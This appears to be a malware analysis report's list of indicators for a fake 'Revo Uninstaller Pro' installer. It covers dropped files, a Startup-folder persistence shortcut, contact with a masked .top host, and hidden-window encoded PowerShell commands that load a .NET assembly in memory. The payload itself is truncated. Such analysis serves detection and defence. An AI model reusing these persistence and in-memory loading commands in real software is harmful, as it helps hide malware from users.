Technical Information
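- %APPDATA%\microsoft\windows\start menu\programs\startup\viva.ini.lnk
  (Note: this shortcut is in the per-user Startup folder, so whatever it points to runs at each logon of that user, which makes it the persistence point in this list. The shortcut's target is not shown here.)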
- %APPDATA%\revo.uninstaller.pro-4.2.3.exe
- %APPDATA%\my.js
- %TEMP%\nsw3a3.tmp
- %TEMP%\nsl3b3.tmp\langdll.dll
- %TEMP%\nsl3b3.tmp\rus-r.bmp
- %TEMP%\nsl3b3.tmp\eng-r.bmp
- %TEMP%\nsl3b3.tmp\ukr-r.bmp
- %TEMP%\nsl3b3.tmp\orange-r.bmp
- %TEMP%\nsl3b3.tmp\modern-header.bmp
- %TEMP%\nsl3b3.tmp\modern-wizard.bmp
- %TEMP%\nsl3b3.tmp\aero.dll
- %TEMP%\nsl3b3.tmp\brandingurl.dll
- %TEMP%\nsl3b3.tmp\nsdialogs.dll
- %TEMP%\nsl3b3.tmp\system.dll
- %HOMEPATH%\appdata\viva.js
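- 'tu###ong.top':80 (outbound connection to TCP port 80)
- DNS ASK tu###ong.top (DNS query for the same host; the name appears partially masked with ### in this listing)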
- '%APPDATA%\revo.uninstaller.pro-4.2.3.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\My.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (with hidden window)
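- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...
  (Note: -e is the abbreviated -EncodedCommand switch, whose argument is Base64 over UTF-16LE text. The visible prefix decodes to "  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64Stri", so after an 8-second delay the script loads a .NET assembly from an embedded Base64 string directly into the PowerShell process. The rest of the argument is truncated in this listing, so the loaded assembly itself cannot be recovered from it.)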